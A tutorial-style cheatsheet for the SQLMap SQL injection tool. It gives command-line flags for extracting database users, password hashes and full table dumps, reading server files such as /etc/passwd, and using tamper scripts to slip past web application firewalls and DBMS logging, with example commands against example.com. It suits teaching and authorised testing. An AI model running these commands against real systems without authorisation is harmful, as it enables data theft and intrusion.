avatarElNiak

Summary

The provided web content is a comprehensive guide on using SQLMap, an open-source tool for detecting and exploiting SQL injection vulnerabilities, which includes basic usage, advanced techniques, and practical examples to enhance cybersecurity defenses.

Abstract

The web content serves as an in-depth cheatsheet for SQLMap, detailing its purpose as an automated SQL injection and database takeover tool. It emphasizes the importance of SQLMap in cybersecurity for vulnerability assessment and penetration testing. The guide covers the installation process, basic arguments for running SQLMap, retrieval of database information, and advanced usage such as injection in different places and customization of injection techniques. It also provides a list of tamper scripts to bypass web application firewalls and filters, practical examples of SQLMap commands, and a reminder to use the tool responsibly for ethical hacking purposes. The content concludes with an invitation to follow the author on various platforms for continuous updates on security insights and tutorials.

Opinions

  • The author suggests that SQLMap is essential for cybersecurity professionals, as it simplifies the process of identifying and exploiting SQL injection flaws.
  • The guide implies that understanding and utilizing SQLMap effectively can significantly improve database security against SQL injection attacks.
  • The author encourages the use of SQLMap within the ethical boundaries of cybersecurity, emphasizing the need for explicit permission when conducting penetration tests.
  • By providing a list of tamper scripts and practical examples, the author conveys the versatility of SQLMap in adapting to different scenarios and bypassing various security measures.
  • The author promotes continuous learning and community engagement by inviting readers to follow their work on platforms like Medium, Twitter, LinkedIn, and GitHub.

Mastering SQLMap: A Comprehensive Guide for Cybersecurity Enthusiasts

Unlock the secrets of SQL Injection with SQLMap. Learn how to detect, exploit, and prevent SQLi vulnerabilities to strengthen your cybersecurity defenses.

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

You can also watch-out other tutorials at:

This guide serves as a comprehensive cheatsheet for using SQLMap effectively, enhancing your vulnerability assessment and penetration testing capabilities.

Getting Started with SQLMap

SQLMap is designed to make SQL injection testing as automated as possible. Before diving into specific commands and techniques, ensure you have SQLMap installed on your system.

SQLMap is included by default in many cybersecurity distributions like Kali Linux, or it can be directly downloaded from its official repository.

Basic Arguments for SQLMap

Generic Usage

  • -u "<URL>": Specify the target URL.
  • -p "<PARAM TO TEST>": Define the parameter to test for SQL injection.
  • --user-agent=SQLMAP: Use a specific User-Agent; --random-agent selects a random User-Agent.
  • --threads=10: Set the number of threads.
  • --risk=3: Set the risk level to maximum (1-3).
  • --level=5: Set the testing level to maximum (1-5).
  • --dbms="<KNOWN DB TECH>": If the DBMS is known, specify it to speed up the test.
  • --os="<OS>": Specify the operating system of the database server.
  • --technique="UB": Use only specified SQL injection techniques (e.g., UNION and Blind).
  • --batch: Run in non-interactive mode, accepting default answers to questions.
  • --proxy=http://127.0.0.1:8080: Use a proxy for traffic.

Retrieve Information

Internal

  • --current-user: Retrieve the current database user.
  • --is-dba: Check if the current user has DBA privileges.
  • --hostname: Obtain the hostname of the database server.
  • --users: List database users.
  • --passwords: Fetch user passwords.
  • --privileges: Get user privileges.

DB Data

  • --dbs: List databases.
  • --tables -D <DB NAME>: List tables in a specific database.
  • --columns -D <DB NAME> -T <TABLE NAME>: List columns in a specific table.
  • --dump -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME>: Dump column data.

Advanced Usage

Injection in Different Places

  • From Burp/ZAP Capture: Use -r req.txt to specify a request file captured from Burp Suite or OWASP ZAP.
  • GET Request Injection: Directly target parameters in the URL with -u "http://example.com/?id=1" -p id.
  • POST Request Injection: For POST requests, use --data "username=*&password=*" to specify POST data.
  • Headers and Other HTTP Methods: Inject into headers, cookies, or use other HTTP methods with --cookie, --headers, and --method.

Customizing Injection

  • String Matching: Use --string="text_when_true" to specify a string present when the query is successful.
  • Eval Function: With --eval, modify payloads with Python commands before sending.
  • File Reading: Retrieve files from the server with --file-read=/etc/passwd.

Automated and Targeted Testing

  • Crawl and Auto-Exploit: Use --crawl=1 to crawl a website and automatically test all links found for SQL injection.
  • Second-Order Injection: Specify a second request with --second-order to test for second-order SQL injection vulnerabilities.

Customizing Injection Techniques

Tamper Scripts:

Utilize --tamper=<name> to bypass web application firewalls (WAFs) or filters with pre-defined or custom tamper scripts.

Here is a list of the temper:

| Tamper                      | Description                                                                                                     |
|-----------------------------|-----------------------------------------------------------------------------------------------------------------|
| apostrophemask.py           | Replaces apostrophe character with its UTF-8 full width counterpart                                             |
| apostrophenullencode.py     | Replaces apostrophe character with its illegal double unicode counterpart                                       |
| appendnullbyte.py           | Appends encoded NULL byte character at the end of payload                                                       |
| base64encode.py             | Base64 all characters in a given payload                                                                        |
| between.py                  | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'                                                 |
| bluecoat.py                 | Replaces space character after SQL statement with a valid random blank character. Afterwards replace character = with LIKE operator |
| chardoubleencode.py         | Double url-encodes all characters in a given payload (not processing already encoded)                           |
| commalesslimit.py           | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'                                                    |
| commalessmid.py             | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'                                               |
| concat2concatws.py          | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'                               |
| charencode.py               | Url-encodes all characters in a given payload (not processing already encoded)                                  |
| charunicodeencode.py        | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)                  |
| equaltolike.py              | Replaces all occurances of operator equal ('=') with operator 'LIKE'                                            |
| escapequotes.py             | Slash escape quotes (' and ")                                                                                   |
| greatest.py                 | Replaces greater than operator ('>') with 'GREATEST' counterpart                                                |
| halfversionedmorekeywords.py| Adds versioned MySQL comment before each keyword                                                                |
| ifnull2ifisnull.py          | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'                                               |
| modsecurityversioned.py     | Embraces complete query with versioned comment                                                                  |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment                                                             |
| multiplespaces.py           | Adds multiple spaces around SQL keywords                                                                        |
| nonrecursivereplacement.py  | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
| percentage.py               | Adds a percentage sign ('%') infront of each character                                                          |
| overlongutf8.py             | Converts all characters in a given payload (not processing already encoded)                                     |
| randomcase.py               | Replaces each keyword character with random case value                                                          |
| randomcomments.py           | Add random comments to SQL keywords                                                                             |
| securesphere.py             | Appends special crafted string                                                                                  |
| sp_password.py              | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs                        |
| space2comment.py            | Replaces space character (' ') with comments                                                                    |
| space2dash.py               | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')    |
| space2hash.py               | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')   |
| space2morehash.py           | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')   |
| space2mssqlblank.py         | Replaces space character (' ') with a random blank character from a valid set of alternate characters           |
| space2mssqlhash.py          | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')                       |
| space2mysqlblank.py         | Replaces space character (' ') with a random blank character from a valid set of alternate characters           |
| space2mysqldash.py          | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')                         |
| space2plus.py               | Replaces space character (' ') with plus ('+')                                                                  |
| space2randomblank.py        | Replaces space character (' ') with a random blank character from a valid set of alternate characters           |
| symboliclogical.py          | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)                              |
| unionalltounion.py          | Replaces UNION ALL SELECT with UNION SELECT                                                                     |
| unmagicquotes.py            | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
| uppercase.py                | Replaces each keyword character with upper case value 'INSERT'                                                  |
| varnish.py                  | Append a HTTP header 'X-originating-IP'                                                                         |
| versionedkeywords.py        | Encloses each non-function keyword with versioned MySQL comment                                                 |
| versionedmorekeywords.py    | Encloses each keyword with versioned MySQL comment                                                              |
| xforwardedfor.py            | Append a fake HTTP header 'X-Forwarded-For'                                                                     |

Then from this article, we can have the following configurations:

  • General Tamper Testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,
charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,
nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,
space2plus,space2randomblank,unionalltounion,unmagicquotes
  • MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,
nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,
space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,
space2randomblank,unionalltounion,unmagicquotes
  • MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,
greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,
modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,
randomcase,securesphere,space2comment,space2hash,space2morehash,
space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,
versionedkeywords,versionedmorekeywords,xforwardedfor

Suffix and Prefix:

Manipulate query termination or injection points with --suffix and --prefix.

Practical Examples

A. Simple GET Request Test

sqlmap -u "http://example.com/?id=1" -p id

B. Using a Proxy for Testing

sqlmap -u "http://example.com" -p "user" --proxy=http://127.0.0.1:8080

C. Database Dump

sqlmap -u "http://example.com/?id=1" -p id --dump

Conclusion

SQLMap is a powerful tool for automating the detection and exploitation of SQL injection vulnerabilities. With this cheatsheet, you’re well-equipped to conduct thorough testing, ensuring your databases are secured against SQL injection attacks.

Remember, ethical hacking and penetration testing should only be conducted with explicit permission from the system owners. Use SQLMap responsibly to help secure applications and educate others about the importance of database security.

For more detailed guides on cybersecurity techniques and tools, follow the provided links to additional resources and support the cybersecurity community through platforms like HackTricks.

Feel free to share your SQLMap success stories, tips, or ask questions in the comments below. Let’s continue to grow our knowledge and secure the digital world together.

Learn more about SQL Injection from the previous article:

Would you like to explore more tools and techniques in cybersecurity? Follow me on Medium and connect on social platforms for continuous updates on security insights and tutorials.

Subscribe on Medium

Follow on Twitter

Connect on LinkedIn

Star on GitHub

Sqlmap
Sql Injection
Programming
Cybersecurity
Bug Bounty
Recommended from ReadMedium
avatarJonathan Mondaut
How ChatGPT Turned Me into a Hacker

Discover how ChatGPT helped me become a hacker, from gathering resources to tackling CTF challenges, all with the power of AI.

4 min read
avatarIsmail Dawoodjee
SQL Injection Authentication Bypass

Reviewing source code and fixing the vulnerability

6 min read
avatarYogasatriautama
VulnLab: Unrestricted File Upload & Cross Site Request Forgery (CSRF)

It is a security vulnerability that occurs as a result of the inability to fully control the files received from the user and may result in…

3 min read
avatarBailey Williams
Port Scanning, Brute Forcing, Decrypting, Oh My!

3 ways I automate my hacking process with WhiteRabbitNeo

5 min read
avatarKhaleel Khan
Unleashing the Power of Reverse Shells: Mastering Ngrok and MSFVenom on Kali Linux

Introduction

3 min read
avatarVijay Gupta
Wifi Hacking Tools

Introduction:

5 min read